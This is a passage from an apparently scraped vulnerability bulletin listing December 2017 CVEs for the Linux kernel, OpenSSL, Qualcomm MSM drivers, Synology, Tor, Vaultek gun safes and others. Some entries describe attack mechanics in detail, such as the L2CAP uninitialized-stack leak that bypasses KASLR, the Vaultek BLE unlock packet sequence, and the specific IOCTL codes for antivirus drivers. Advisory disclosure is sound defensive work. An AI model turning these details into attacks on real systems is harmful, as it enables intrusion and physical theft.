libxfont_libxfont2 -- libxfont_libxfont2In libXfont before 1.5.4 and libXfont2 before 2.0.3, a local attacker can open (but not read) files on the system as root, triggering tape rewinds, watchdogs, or similar mechanisms that can be triggered by opening files.2017-12-01not yet calculatedCVE-2017-16611
MISC
MLIST
UBUNTU
CONFIRM
MLIST
MLIST
linux -- linux_kernel
 		The bnep_add_connection function in net/bluetooth/bnep/core.c in the Linux kernel before 3.19 does not ensure that an l2cap socket is available, which allows local users to gain privileges via a crafted application.2017-12-05not yet calculatedCVE-2017-15868
CONFIRM
BID
CONFIRM
CONFIRM
CONFIRM
linux -- linux_kernel
 		The dccp_disconnect function in net/dccp/proto.c in the Linux kernel through 4.14.3 allows local users to gain privileges or cause a denial of service (use-after-free) via an AF_UNSPEC connect system call during the DCCP_LISTEN state.2017-12-05not yet calculatedCVE-2017-8824
MISC
MISC
BID
linux -- linux_kernel
 		net/netfilter/nfnetlink_cthelper.c in the Linux kernel through 4.14.4 does not require the CAP_NET_ADMIN capability for new, get, and del operations, which allows local users to bypass intended access restrictions because the nfnl_cthelper_list data structure is shared across all net namespaces.2017-12-06not yet calculatedCVE-2017-17448
BID
MISC
linux -- linux_kernel
 		The __netlink_deliver_tap_skb function in net/netlink/af_netlink.c in the Linux kernel through 4.14.4, when CONFIG_NLMON is enabled, does not restrict observations of Netlink messages to a single net namespace, which allows local users to obtain sensitive information by leveraging the CAP_NET_ADMIN capability to sniff an nlmon interface for all Netlink activity on the system.2017-12-06not yet calculatedCVE-2017-17449
MISC
linux -- linux_kernel
 		net/netfilter/xt_osf.c in the Linux kernel through 4.14.4 does not require the CAP_NET_ADMIN capability for add_callback and remove_callback operations, which allows local users to bypass intended access restrictions because the xt_osf_fingers data structure is shared across all net namespaces.2017-12-06not yet calculatedCVE-2017-17450
BID
MISC
linux -- linux_kernel
 		The Linux kernel version 3.3-rc1 and later is affected by a vulnerability lies in the processing of incoming L2CAP commands - ConfigRequest, and ConfigResponse messages. This info leak is a result of uninitialized stack variables that may be returned to an attacker in their uninitialized state. By manipulating the code flows that precede the handling of these configuration messages, an attacker can also gain some control over which data will be held in the uninitialized stack variables. This can allow him to bypass KASLR, and stack canaries protection - as both pointers and stack canaries may be leaked in this manner. Combining this vulnerability (for example) with the previously disclosed RCE vulnerability in L2CAP configuration parsing (CVE-2017-1000251) may allow an attacker to exploit the RCE against kernels which were built with the above mitigations. These are the specifics of this vulnerability: In the function l2cap_parse_conf_rsp and in the function l2cap_parse_conf_req the following variable is declared without initialization: struct l2cap_conf_efs efs; In addition, when parsing input configuration parameters in both of these functions, the switch case for handling EFS elements may skip the memcpy call that will write to the efs variable: ... case L2CAP_CONF_EFS: if (olen == sizeof(efs)) memcpy(&efs, (void *)val, olen); ... The olen in the above if is attacker controlled, and regardless of that if, in both of these functions the efs variable would eventually be added to the outgoing configuration request that is being built: l2cap_add_conf_opt(&ptr, L2CAP_CONF_EFS, sizeof(efs), (unsigned long) &efs); So by sending a configuration request, or response, that contains an L2CAP_CONF_EFS element, but with an element length that is not sizeof(efs) - the memcpy to the uninitialized efs variable can be avoided, and the uninitialized variable would be returned to the attacker (16 bytes).2017-12-07not yet calculatedCVE-2017-1000410
MLIST
BID
mercurial -- mercurial
 		In Mercurial before 4.4.1, it is possible that a specially malformed repository can cause Git subrepositories to run arbitrary code in the form of a .git/hooks/post-update script checked into the repository. Typical use of Mercurial prevents construction of such repositories, but they can be created programmatically.2017-12-07not yet calculatedCVE-2017-17458
MISC
MISC
MISC
microsoft -- malware_protection_engine
 		The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Windows 7 SP1, Windows 8.1, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, 1709 and Windows Server 2016, Windows Server, version 1709, Microsoft Exchange Server 2013 and 2016, does not properly scan a specially crafted file leading to remote code execution. aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability".2017-12-07not yet calculatedCVE-2017-11937
BID
SECTRACK
CONFIRM
microsoft -- malware_protection_engine
 		The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Windows 7 SP1, Windows 8.1, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, 1709 and Windows Server 2016, Windows Server, version 1709, Microsoft Exchange Server 2013 and 2016, does not properly scan a specially crafted file leading to remote code execution. aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability". This is different than CVE-2017-11937.2017-12-08not yet calculatedCVE-2017-11940
BID
SECTRACK
CONFIRM
microsoft -- windows
 		ntguard_x64.sys 0.18780.0.0 in IKARUS anti.virus 2.16.15 has a NULL pointer dereference via a 0x830000c4 DeviceIoControl request.2017-12-04not yet calculatedCVE-2017-17113
MISC
microsoft -- windows
 		ntguard_x64.sys 0.18780.0.0 in IKARUS anti.virus 2.16.15 has a Pool Corruption vulnerability via a 0x83000058 DeviceIoControl request.2017-12-04not yet calculatedCVE-2017-17112
MISC
microsoft -- windows
 		ntguard.sys and ntguard_x64.sys 0.18780.0.0 in IKARUS anti.virus 2.16.15 have a Memory Corruption vulnerability via a 0x83000084 DeviceIoControl request.2017-12-04not yet calculatedCVE-2017-17114
MISC
mistserver -- mistserver
 		Cross-site scripting (XSS) vulnerability in MistServer before 2.13 allows remote attackers to inject arbitrary web script or HTML via vectors related to failed authentication requests alerts.2017-12-06not yet calculatedCVE-2017-16884
MISC
MISC
FULLDISC
CONFIRM
EXPLOIT-DB
open_ticket_request_system -- open_ticket_request_system
 		In OTRS 6.0.x up to and including 6.0.1, OTRS 5.0.x up to and including 5.0.24, and OTRS 4.0.x up to and including 4.0.26, an attacker who is logged into OTRS as an agent can manipulate form parameters (related to PGP) and execute arbitrary shell commands with the permissions of the OTRS or web server user.2017-12-08not yet calculatedCVE-2017-16921
CONFIRM
open_ticket_request_system -- open_ticket_request_system
 		In Open Ticket Request System (OTRS) through 3.3.20, 4 through 4.0.26, 5 through 5.0.24, and 6 through 6.0.1, an attacker who is logged in as a customer can use the ticket search form to disclose internal article information of their customer tickets.2017-12-08not yet calculatedCVE-2017-16854
CONFIRM
openafs -- openafs
 		OpenAFS 1.x before 1.6.22 does not properly validate Rx ack packets, which allows remote attackers to cause a denial of service (system crash or application crash) via crafted fields, as demonstrated by an integer underflow and assertion failure for a small MTU value.2017-12-05not yet calculatedCVE-2017-17432
CONFIRM
CONFIRM
openjpg -- openjpg
 		In OpenJPEG 2.3.0, a stack-based buffer overflow was discovered in the pgxtoimage function in jpwl/convert.c. The vulnerability causes an out-of-bounds write, which may lead to remote denial of service or possibly remote code execution.2017-12-08not yet calculatedCVE-2017-17479
MISC
openjpg -- openjpg
 		In OpenJPEG 2.3.0, a stack-based buffer overflow was discovered in the pgxtovolume function in jp3d/convert.c. The vulnerability causes an out-of-bounds write, which may lead to remote denial of service or possibly remote code execution.2017-12-08not yet calculatedCVE-2017-17480
MISC
openssl -- openssl
 		OpenSSL 1.0.2 (starting from version 1.0.2b) introduced an "error state" mechanism. The intent was that if a fatal error occurred during a handshake then OpenSSL would move into the error state and would immediately fail if you attempted to continue the handshake. This works as designed for the explicit handshake functions (SSL_do_handshake(), SSL_accept() and SSL_connect()), however due to a bug it does not work correctly if SSL_read() or SSL_write() is called directly. In that scenario, if the handshake fails then a fatal error will be returned in the initial function call. If SSL_read()/SSL_write() is subsequently called by the application for the same SSL object then it will succeed and the data is passed without being decrypted/encrypted directly from the SSL/TLS record layer. In order to exploit this issue an application bug would have to be present that resulted in a call to SSL_read()/SSL_write() being issued after having already received a fatal error. OpenSSL version 1.0.2b-1.0.2m are affected. Fixed in OpenSSL 1.0.2n. OpenSSL 1.1.0 is not affected.2017-12-07not yet calculatedCVE-2017-3737
BID
SECTRACK
CONFIRM
CONFIRM
openssl -- openssl
 		There is an overflow bug in the AVX2 Montgomery multiplication procedure used in exponentiation with 1024-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH1024 are considered just feasible, because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH1024 private key among multiple clients, which is no longer an option since CVE-2016-0701. This only affects processors that support the AVX2 but not ADX extensions like Intel Haswell (4th generation). Note: The impact from this issue is similar to CVE-2017-3736, CVE-2017-3732 and CVE-2015-3193. OpenSSL version 1.0.2-1.0.2m and 1.1.0-1.1.0g are affected. Fixed in OpenSSL 1.0.2n. Due to the low severity of this issue we are not issuing a new release of OpenSSL 1.1.0 at this time. The fix will be included in OpenSSL 1.1.0h when it becomes available. The fix is also available in commit e502cc86d in the OpenSSL git repository.2017-12-07not yet calculatedCVE-2017-3738
BID
SECTRACK
CONFIRM
CONFIRM
openstack/nova -- openstack/nova
 		An issue was discovered in the default FilterScheduler in OpenStack Nova 16.0.3. By repeatedly rebuilding an instance with new images, an authenticated user may consume untracked resources on a hypervisor host leading to a denial of service, aka doubled resource allocations. This regression was introduced with the fix for OSSA-2017-005 (CVE-2017-16239); however, only Nova stable/pike or later deployments with that fix applied and relying on the default FilterScheduler are affected.2017-12-05not yet calculatedCVE-2017-17051
BID
CONFIRM
CONFIRM
CONFIRM
CONFIRM
puppet -- puppet_agent
 		Versions of Puppet Agent prior to 1.6.0 included a version of the Puppet Execution Protocol (PXP) agent that passed environment variables through to Puppet runs. This could allow unauthorized code to be loaded. This bug was first introduced in Puppet Agent 1.3.0.2017-12-06not yet calculatedCVE-2016-5713
CONFIRM
qemu -- qemu
 		The Virtio Vring implementation in QEMU allows local OS guest users to cause a denial of service (divide-by-zero error and QEMU process crash) by unsetting vring alignment while updating Virtio rings.2017-12-06not yet calculatedCVE-2017-17381
MLIST
BID
MLIST
qualcomm -- msmIn Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, a Use After Free condition can occur during positioning.2017-12-05not yet calculatedCVE-2017-11006
BID
CONFIRM
qualcomm -- msmIn Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in a graphics driver ioctl handler, the lack of copy_from_user() function calls may result in writes to kernel memory.2017-12-05not yet calculatedCVE-2017-11047
CONFIRM
qualcomm -- msmIn Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, improperly specified offset/size values for a submission command could cause a math operation to overflow and could result in an access to arbitrary memory. The combined pointer will overflow and possibly pass further checks intended to avoid accessing unintended memory.2017-12-05not yet calculatedCVE-2017-9698
CONFIRM
qualcomm -- msmIn Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, while processing the SENDACTIONFRAME IOCTL, a buffer over-read can occur if the payload length is less than 7.2017-12-05not yet calculatedCVE-2017-14903
CONFIRM
qualcomm -- msmIn Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in a KGSL driver function, a race condition exists which can lead to a Use After Free condition.2017-12-05not yet calculatedCVE-2017-11044
CONFIRM
qualcomm -- msmIn Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in the GPS location wireless interface, a Use After Free condition can occur.2017-12-05not yet calculatedCVE-2017-14918
BID
CONFIRM
qualcomm -- msmIn Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, ImsService and the IQtiImsExt AIDL APIs are not subject to access control.2017-12-05not yet calculatedCVE-2017-11042
CONFIRM
qualcomm -- msmIn Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, the VIDIOC_G_SDE_ROTATOR_FENCE ioctl command can be used to cause a Use After Free condition.2017-12-05not yet calculatedCVE-2017-11031
CONFIRM
qualcomm -- msmIn Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, the fd allocated during the get_metadata was not closed even though the buffer allocated to the fd was freed. This resulted in a failure during exit sequence.2017-12-05not yet calculatedCVE-2017-11019
CONFIRM
qualcomm -- msmIn Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, there is a memory allocation without a length field validation in the mobicore driver which can result in an undersize buffer allocation. Ultimately this can result in a kernel memory overwrite.2017-12-05not yet calculatedCVE-2017-14896
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, cryptographic strength is reduced while deriving disk encryption key.2017-12-05not yet calculatedCVE-2017-14907
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, while processing a specially crafted cfg80211 vendor command, a buffer over-read can occur.2017-12-05not yet calculatedCVE-2017-14905
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, the SafeSwitch test application does not properly validate the number of blocks to verify.2017-12-05not yet calculatedCVE-2017-14908
BID
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, while handling the QSEOS_RPMB_CHECK_PROV_STATUS_COMMAND, a userspace buffer is directly accessed in kernel space.2017-12-05not yet calculatedCVE-2017-14897
BID
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, IOCTL interface to send QMI NOTIFY REQ messages can be called from multiple contexts which can result in buffer overflow of msg cache.2017-12-05not yet calculatedCVE-2017-9710
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in a video driver, a race condition exists which can potentially lead to a buffer overflow.2017-12-05not yet calculatedCVE-2017-11049
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, while processing the QCA_NL80211_VENDOR_SUBCMD_GET_CHAIN_RSSI vendor command, in which attribute QCA_WLAN_VENDOR_ATTR_MAC_ADDR contains fewer than 6 bytes, a buffer overrun occurs.2017-12-05not yet calculatedCVE-2017-14900
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, buffer sizes in the message passing interface are not properly validated.2017-12-05not yet calculatedCVE-2017-14916
BID
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, due to a race condition in the GLink kernel driver, a Use After Free condition can potentially occur.2017-12-05not yet calculatedCVE-2017-14902
BID
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, while processing the QCA_NL80211_VENDOR_SUBCMD_SET_TXPOWER_SCALE vendor command, in which attribute QCA_WLAN_VENDOR_ATTR_TXPOWER_SCALE contains fewer than 1 byte, a buffer overrun occurs.2017-12-05not yet calculatedCVE-2017-14901
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, while processing the QCA_NL80211_VENDOR_SUBCMD_SET_TXPOWER_SCALE_DECR_DB vendor command, in which attribute QCA_WLAN_VENDOR_ATTR_TXPOWER_SCALE_DECR_DB contains fewer than 1 byte, a buffer overrun occurs.2017-12-05not yet calculatedCVE-2017-14899
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, a count value that is read from a file is not properly validated.2017-12-05not yet calculatedCVE-2017-14909
BID
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, while processing the QCA_NL80211_VENDOR_SUBCMD_SET_TXPOWER_SCALE vendor command, in which attribute QCA_WLAN_VENDOR_ATTR_TXPOWER_SCALE contains fewer than 1 byte, a buffer overrun occurs.2017-12-05not yet calculatedCVE-2017-14898
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, a crafted binder request can cause an arbitrary unmap in MediaServer.2017-12-05not yet calculatedCVE-2017-14904
BID
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, buffer overwrite is possible in fw_name_store if image name is 64 characters.2017-12-05not yet calculatedCVE-2017-9700
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, after a subsystem reset, iwpriv is not giving correct information.2017-12-05not yet calculatedCVE-2017-14895
BID
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in the HDMI video driver function hdmi_edid_sysfs_rda_res_info(), userspace can perform an arbitrary write into kernel memory.2017-12-05not yet calculatedCVE-2017-11030
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, a race condition in a multimedia driver can potentially lead to a buffer overwrite.2017-12-05not yet calculatedCVE-2017-9718
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, when updating custom EDID (hdmi_tx_sysfs_wta_edid), if edid_size, which is controlled by userspace, is too large, a buffer overflow occurs.2017-12-05not yet calculatedCVE-2017-9722
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in the coresight-tmc driver, a simultaneous read and enable of the ETR device after changing the buffer size may result in a Use After Free condition of the previous buffer.2017-12-05not yet calculatedCVE-2017-11033
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in the camera driver, the function "msm_ois_power_down" is called without a mutex and a race condition can occur in variable "*reg_ptr" of sub function "msm_camera_config_single_vreg".2017-12-05not yet calculatedCVE-2017-9708
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, the qbt1000 driver implements an alternative channel for usermode applications to talk to QSEE applications.2017-12-05not yet calculatedCVE-2017-9716
BID
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in a camera driver function, a race condition exists which can lead to a Use After Free condition.2017-12-05not yet calculatedCVE-2017-11045
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, a privilege escalation vulnerability exists in telephony.2017-12-05not yet calculatedCVE-2017-9709
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in the processing of a downlink supplementary services message, a buffer overflow can occur.2017-12-05not yet calculatedCVE-2017-6211
BID
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, a race condition in a Camera driver can lead to a Use After Free condition.2017-12-05not yet calculatedCVE-2017-9703
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, there is a possibility of stack corruption due to buffer overflow of Partition name while converting ascii string to unicode string in function HandleMetaImgFlash.2017-12-05not yet calculatedCVE-2017-11007
BID
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, in a WiFI driver function, an integer overflow leading to heap buffer overflow may potentially occur.2017-12-05not yet calculatedCVE-2017-11043
BID
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, a Use After Free condition can occur during a deinitialization path.2017-12-05not yet calculatedCVE-2017-11005
BID
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, buffer sizes in the message passing interface are not properly validated.2017-12-05not yet calculatedCVE-2017-14917
BID
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, when memory allocation fails while creating a calibration block in create_cal_block stale pointers are left uncleared.2017-12-05not yet calculatedCVE-2017-11016
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, handles in the global client structure can become stale.2017-12-05not yet calculatedCVE-2017-14914
BID
CONFIRM
qualcomm -- msm
 		In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, a buffer overflow can occur while reading firmware logs.2017-12-05not yet calculatedCVE-2017-15813
CONFIRM
red_hat -- red_hat_enterprise_linux
 		A non-privileged user is able to mount a fuse filesystem on RHEL 6 or 7 and crash a system if an application punches a hole in a file that does not end aligned to a page boundary.2017-12-06not yet calculatedCVE-2017-15121
CONFIRM
rsync -- rsync
 		The daemon in rsync 3.1.2, and 3.1.3-development before 2017-12-03, does not check for fnamecmp filenames in the daemon_filter_list data structure (in the recv_files function in receiver.c) and also does not apply the sanitize_paths protection mechanism to pathnames found in "xname follows" strings (in the read_ndx_and_attrs function in rsync.c), which allows remote attackers to bypass intended access restrictions.2017-12-05not yet calculatedCVE-2017-17434
MISC
MISC
rsync -- rsync
 		The recv_files function in receiver.c in the daemon in rsync 3.1.2, and 3.1.3-development before 2017-12-03, proceeds with certain file metadata updates before checking for a filename in the daemon_filter_list data structure, which allows remote attackers to bypass intended access restrictions.2017-12-05not yet calculatedCVE-2017-17433
MISC
sangoma -- netborder_session_controller
 		Sangoma NetBorder / Vega Session Controller before 2.3.12-80-GA allows remote attackers to execute arbitrary commands via the web interface.2017-12-07not yet calculatedCVE-2017-17430
CONFIRM
sap -- business_objects_financial_consolidation
 		Cross-Site Scripting (XSS) exists in SAP Business Objects Financial Consolidation before 2017-06-13, aka SAP Security Note 2422292.2017-12-03not yet calculatedCVE-2017-14516
CONFIRM
synology -- calendar
 		Improper access control vulnerability in SYNO.Cal.EventBase in Synology Calendar before 2.0.1-0242 allows remote authenticated users to modify calendar event via unspecified vectors.2017-12-08not yet calculatedCVE-2017-15891
CONFIRM
synology -- diskstation_manager
 		Command injection vulnerability in smart.cgi in Synology DiskStation Manager (DSM) before 5.2-5967-5 allows remote authenticated users to execute arbitrary commands via disk field.2017-12-04not yet calculatedCVE-2017-15889
CONFIRM
synology -- diskstation_manager

 		Directory traversal vulnerability in the SYNO.FileStation.Extract in Synology DiskStation Manager (DSM) 6.0.x before 6.0.3-8754-3 and before 5.2-5967-6 allows remote authenticated users to write arbitrary files via the dest_folder_path parameter.2017-12-08not yet calculatedCVE-2017-15894
CONFIRM
synology -- file_station
 		Directory traversal vulnerability in the SYNO.FileStation.Extract in Synology File Station before 1.1.1-0099 allows remote authenticated users to write arbitrary files via the dest_folder_path parameter.2017-12-08not yet calculatedCVE-2017-15893
CONFIRM
synology -- photo_station
 		Files or directories accessible to external parties vulnerability in picasa.php in Synology Photo Station before 6.8.1-3458 and before 6.3-2970 allows remote attackers to obtain arbitrary files via prog_id field.2017-12-04not yet calculatedCVE-2017-12079
CONFIRM
synology -- photo_station
 		An information exposure vulnerability in default HTTP configuration file in Synology Photo Station before 6.8.1-3458 and before 6.3-2970 allows remote attackers to obtain sensitive system information via .htaccess file.2017-12-04not yet calculatedCVE-2017-12080
CONFIRM
synology -- router_manager
 		Directory traversal vulnerability in the SYNO.FileStation.Extract in Synology Router Manager (SRM) before 1.1.5-6542-4 allows remote authenticated users to write arbitrary files via the dest_folder_path parameter.2017-12-08not yet calculatedCVE-2017-15895
CONFIRM
tg_soft -- vir.it_explorer_liteTG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact via a \\.\Viragtlt DeviceIoControl request of 0x82730050.2017-12-08not yet calculatedCVE-2017-17473
MISC
tg_soft -- vir.it_explorer_lite
 		TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact via a \\.\Viragtlt DeviceIoControl request of 0x82736068.2017-12-08not yet calculatedCVE-2017-17475
MISC
tg_soft -- vir.it_explorer_lite
 		TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact via a \\.\Viragtlt DeviceIoControl request of 0x82732140.2017-12-08not yet calculatedCVE-2017-17471
MISC
tg_soft -- vir.it_explorer_lite
 		TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to gain privileges or cause a denial of service (Arbitrary Write) via a \\.\Viragtlt DeviceIoControl request of 0x82730088.2017-12-08not yet calculatedCVE-2017-17466
MISC
tg_soft -- vir.it_explorer_lite
 		TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact via a \\.\Viragtlt DeviceIoControl request of 0x82730070.2017-12-08not yet calculatedCVE-2017-17474
MISC
tg_soft -- vir.it_explorer_lite
 		TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact via a \\.\Viragtlt DeviceIoControl request of 0x82730074.2017-12-08not yet calculatedCVE-2017-17467
MISC
tg_soft -- vir.it_explorer_lite
 		TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact via a \\.\Viragtlt DeviceIoControl request of 0x82730030.2017-12-08not yet calculatedCVE-2017-17472
MISC
tg_soft -- vir.it_explorer_lite
 		TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to gain privileges or cause a denial of service (Arbitrary Write) via a \\.\Viragtlt DeviceIoControl request of 0x82730020, a different vulnerability than CVE-2017-17050.2017-12-08not yet calculatedCVE-2017-17468
MISC
tg_soft -- vir.it_explorer_lite
 		TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact via a \\.\Viragtlt DeviceIoControl request of 0x82730054.2017-12-08not yet calculatedCVE-2017-17470
MISC
tg_soft -- vir.it_explorer_lite
 		TG Soft Vir.IT eXplorer Lite 8.5.42 allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact via a \\.\Viragtlt DeviceIoControl request of 0x82730008, a different vulnerability than CVE-2017-16948.2017-12-08not yet calculatedCVE-2017-17469
MISC
tor -- tor
 		In Tor before 0.2.5.16, 0.2.6 through 0.2.8 before 0.2.8.17, 0.2.9 before 0.2.9.14, 0.3.0 before 0.3.0.13, and 0.3.1 before 0.3.1.9, relays (that have incompletely downloaded descriptors) can pick themselves in a circuit path, leading to a degradation of anonymity, aka TROVE-2017-012.2017-12-03not yet calculatedCVE-2017-8822
CONFIRM
CONFIRM
CONFIRM
DEBIAN
tor -- tor
 		In Tor before 0.2.5.16, 0.2.6 through 0.2.8 before 0.2.8.17, 0.2.9 before 0.2.9.14, 0.3.0 before 0.3.0.13, and 0.3.1 before 0.3.1.9, remote attackers can cause a denial of service (NULL pointer dereference and application crash) against directory authorities via a malformed descriptor, aka TROVE-2017-010.2017-12-03not yet calculatedCVE-2017-8820
CONFIRM
CONFIRM
DEBIAN
tor -- tor
 		In Tor before 0.2.5.16, 0.2.6 through 0.2.8 before 0.2.8.17, 0.2.9 before 0.2.9.14, 0.3.0 before 0.3.0.13, and 0.3.1 before 0.3.1.9, there is a use-after-free in onion service v2 during intro-point expiration because the expiring list is mismanaged in certain error cases, aka TROVE-2017-013.2017-12-03not yet calculatedCVE-2017-8823
CONFIRM
CONFIRM
CONFIRM
DEBIAN
tor -- tor
 		In Tor before 0.2.5.16, 0.2.6 through 0.2.8 before 0.2.8.17, 0.2.9 before 0.2.9.14, 0.3.0 before 0.3.0.13, and 0.3.1 before 0.3.1.9, an attacker can cause a denial of service (application hang) via crafted PEM input that signifies a public key requiring a password, which triggers an attempt by the OpenSSL library to ask the user for the password, aka TROVE-2017-011.2017-12-03not yet calculatedCVE-2017-8821
CONFIRM
CONFIRM
DEBIAN
tor -- tor
 		In Tor before 0.2.5.16, 0.2.6 through 0.2.8 before 0.2.8.17, 0.2.9 before 0.2.9.14, 0.3.0 before 0.3.0.13, and 0.3.1 before 0.3.1.9, the replay-cache protection mechanism is ineffective for v2 onion services, aka TROVE-2017-009. An attacker can send many INTRODUCE2 cells to trigger this issue.2017-12-03not yet calculatedCVE-2017-8819
CONFIRM
CONFIRM
DEBIAN
tor -- tor                                                 
 		Tor before 0.2.8.12 might allow remote attackers to cause a denial of service (client crash) via a crafted hidden service descriptor.2017-12-05not yet calculatedCVE-2016-1254
SUSE
SUSE
CONFIRM
CONFIRM
FEDORA
FEDORA
CONFIRM
DEBIAN
vaultek -- vt20_series_gun_safe
 		An issue was discovered in the software on Vaultek Gun Safe VT20i products, aka BlueSteal. An attacker can remotely unlock any safe in this product line without a valid PIN code. Even though the phone application requires it and there is a field to supply the PIN code in an authorization request, the safe does not check the PIN code, so an attacker can obtain authorization using any value. Once an attacker sees the Bluetooth Low Energy (BLE) advertisement for the safe, they need only to write a BLE characteristic to enable notifications, and send a crafted getAuthor packet that returns a temporary key, and an unlock packet including that temporary key. The safe then opens after the unlock packet is processed, with no verification of PIN or other credentials.2017-12-06not yet calculatedCVE-2017-17435
MISC
vaultek -- vt20_series_gun_safe
 		An issue was discovered in the software on Vaultek Gun Safe VT20i products. There is no encryption of the session between the Android application and the safe. The website and marketing materials advertise that this communication channel is encrypted with "Highest Level Bluetooth Encryption" and "Data transmissions are secure via AES256 bit encryption." These claims, however, are not true. Moreover, AES256 bit encryption is not supported in the Bluetooth Low Energy (BLE) standard, so it would have to be at the application level. This lack of encryption allows an individual to learn the passcode by eavesdropping on the communications between the application and the safe.2017-12-06not yet calculatedCVE-2017-17436
MISC
vivo -- modems
